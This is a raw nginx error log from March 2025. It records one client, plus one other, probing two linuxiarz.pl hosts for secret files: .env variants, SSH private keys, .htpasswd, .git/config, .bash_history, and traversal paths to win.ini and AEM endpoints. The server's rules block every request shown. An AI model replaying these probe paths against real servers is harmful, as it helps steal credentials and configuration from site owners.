"nginx.linuxiarz.pl" +2025/03/06 15:06:40 [error] 3404146#3404146: *40949 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:40 [error] 3404146#3404146: *40950 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:40 [error] 3404146#3404146: *40951 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:40 [error] 3404146#3404146: *40952 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:43 [error] 3404146#3404146: *40959 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:43 [error] 3404146#3404146: *40960 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:43 [error] 3404146#3404146: *40961 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:07:04 [error] 3404146#3404146: *40982 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:07:04 [error] 3404146#3404146: *40983 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:07:04 [error] 3404146#3404146: *40984 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:07:04 [error] 3404146#3404146: *40985 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:07:04 [error] 3404146#3404146: *40986 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:07:04 [error] 3404146#3404146: *40987 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:07:04 [error] 3404146#3404146: *40988 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:09:40 [error] 3404146#3404146: *41159 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:11:14 [error] 3404146#3404146: *41251 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:11:53 [error] 3404146#3404146: *41296 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:12:06 [error] 3404146#3404146: *41309 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:12:20 [error] 3404146#3404146: *41321 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /artemis/1/..;/env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:12:23 [error] 3404146#3404146: *41323 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:12:40 [error] 3404146#3404146: *41339 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /js/../.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:18:31 [error] 3404146#3404146: *41725 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/07 17:26:56 [error] 3404145#3404145: *111538 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/03/08 00:15:03 [error] 3404146#3404146: *126754 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:04 [error] 3404146#3404146: *126761 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:05 [error] 3404146#3404146: *126766 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:06 [error] 3404146#3404146: *126768 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:08 [error] 3404146#3404146: *126777 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:12 [error] 3404146#3404146: *126799 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:22 [error] 3404146#3404146: *126842 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:28 [error] 3404146#3404146: *126867 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:30 [error] 3404146#3404146: *126876 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:32 [error] 3404146#3404146: *126895 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:41 [error] 3404146#3404146: *126945 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:48 [error] 3404146#3404146: *126972 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:49 [error] 3404146#3404146: *126979 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:50 [error] 3404146#3404146: *126983 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:54 [error] 3404146#3404146: *127000 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:55 [error] 3404146#3404146: *127003 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:55 [error] 3404146#3404146: *127004 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:57 [error] 3404146#3404146: *127036 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:15:58 [error] 3404146#3404146: *127039 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:03 [error] 3404146#3404146: *127067 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:05 [error] 3404146#3404146: *127077 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:08 [error] 3404146#3404146: *127089 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:12 [error] 3404146#3404146: *127109 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:14 [error] 3404146#3404146: *127117 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:15 [error] 3404146#3404146: *127120 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:18 [error] 3404146#3404146: *127135 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:19 [error] 3404146#3404146: *127141 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:22 [error] 3404146#3404146: *127150 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:22 [error] 3404146#3404146: *127154 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:30 [error] 3404146#3404146: *127196 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 00:16:32 [error] 3404146#3404146: *127202 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:15 [error] 3404146#3404146: *131676 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:19 [error] 3404146#3404146: *131714 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:20 [error] 3404146#3404146: *131718 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:22 [error] 3404146#3404146: *131742 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:24 [error] 3404146#3404146: *131761 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:24 [error] 3404146#3404146: *131763 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:25 [error] 3404146#3404146: *131775 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:28 [error] 3404146#3404146: *131805 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:31 [error] 3404146#3404146: *131831 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:33 [error] 3404146#3404146: *131849 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:38 [error] 3404146#3404146: *131889 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:42 [error] 3404146#3404146: *131935 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:45 [error] 3404146#3404146: *131963 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:46 [error] 3404146#3404146: *131971 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:48 [error] 3404146#3404146: *131987 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:48 [error] 3404146#3404146: *131993 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:48 [error] 3404146#3404146: *131995 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:50 [error] 3404146#3404146: *132009 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:21:59 [error] 3404146#3404146: *132103 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:02 [error] 3404146#3404146: *132125 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:07 [error] 3404146#3404146: *132178 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:13 [error] 3404146#3404146: *132230 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:16 [error] 3404146#3404146: *132260 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:21 [error] 3404146#3404146: *132310 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:24 [error] 3404146#3404146: *132333 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:25 [error] 3404146#3404146: *132342 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:29 [error] 3404146#3404146: *132378 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:32 [error] 3404146#3404146: *132406 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:35 [error] 3404146#3404146: *132424 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:37 [error] 3404146#3404146: *132430 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 02:22:45 [error] 3404146#3404146: *132496 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 06:58:16 [error] 3404146#3404146: *148498 access forbidden by rule, client: 45.148.10.238, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/08 12:53:47 [error] 3404146#3404146: *170045 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:53:49 [error] 3404146#3404146: *170055 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:53:54 [error] 3404146#3404146: *170079 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:53:55 [error] 3404146#3404146: *170083 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:53:55 [error] 3404146#3404146: *170084 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:53:57 [error] 3404146#3404146: *170096 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:01 [error] 3404146#3404146: *170130 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:07 [error] 3404146#3404146: *170161 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:09 [error] 3404146#3404146: *170170 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:10 [error] 3404146#3404146: *170179 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:12 [error] 3404146#3404146: *170194 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:13 [error] 3404146#3404146: *170198 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:16 [error] 3404146#3404146: *170215 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:17 [error] 3404146#3404146: *170218 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:19 [error] 3404146#3404146: *170228 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:20 [error] 3404146#3404146: *170232 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:21 [error] 3404146#3404146: *170238 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:27 [error] 3404146#3404146: *170267 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:36 [error] 3404146#3404146: *170313 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:42 [error] 3404146#3404146: *170345 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:45 [error] 3404146#3404146: *170361 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:48 [error] 3404146#3404146: *170373 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:50 [error] 3404146#3404146: *170384 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:55 [error] 3404146#3404146: *170405 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:54:58 [error] 3404146#3404146: *170423 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:55:00 [error] 3404146#3404146: *170431 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:55:02 [error] 3404146#3404146: *170440 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:55:02 [error] 3404146#3404146: *170443 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:55:05 [error] 3404146#3404146: *170454 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:55:05 [error] 3404146#3404146: *170455 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 12:55:06 [error] 3404146#3404146: *170462 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:40 [error] 3404146#3404146: *170669 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:42 [error] 3404146#3404146: *170693 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:43 [error] 3404146#3404146: *170707 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:45 [error] 3404146#3404146: *170719 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:47 [error] 3404146#3404146: *170739 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:48 [error] 3404146#3404146: *170753 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:49 [error] 3404146#3404146: *170761 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:51 [error] 3404146#3404146: *170783 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:54 [error] 3404146#3404146: *170807 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:56 [error] 3404146#3404146: *170825 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:56 [error] 3404146#3404146: *170831 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:06:57 [error] 3404146#3404146: *170839 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:04 [error] 3404146#3404146: *170913 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:06 [error] 3404146#3404146: *170931 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:10 [error] 3404146#3404146: *170971 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:15 [error] 3404146#3404146: *171019 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:20 [error] 3404146#3404146: *171068 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:22 [error] 3404146#3404146: *171084 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:25 [error] 3404146#3404146: *171110 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:29 [error] 3404146#3404146: *171154 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:31 [error] 3404146#3404146: *171170 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:33 [error] 3404146#3404146: *171190 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:36 [error] 3404146#3404146: *171218 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:38 [error] 3404146#3404146: *171244 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:43 [error] 3404146#3404146: *171294 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:53 [error] 3404146#3404146: *171403 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:54 [error] 3404146#3404146: *171411 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:55 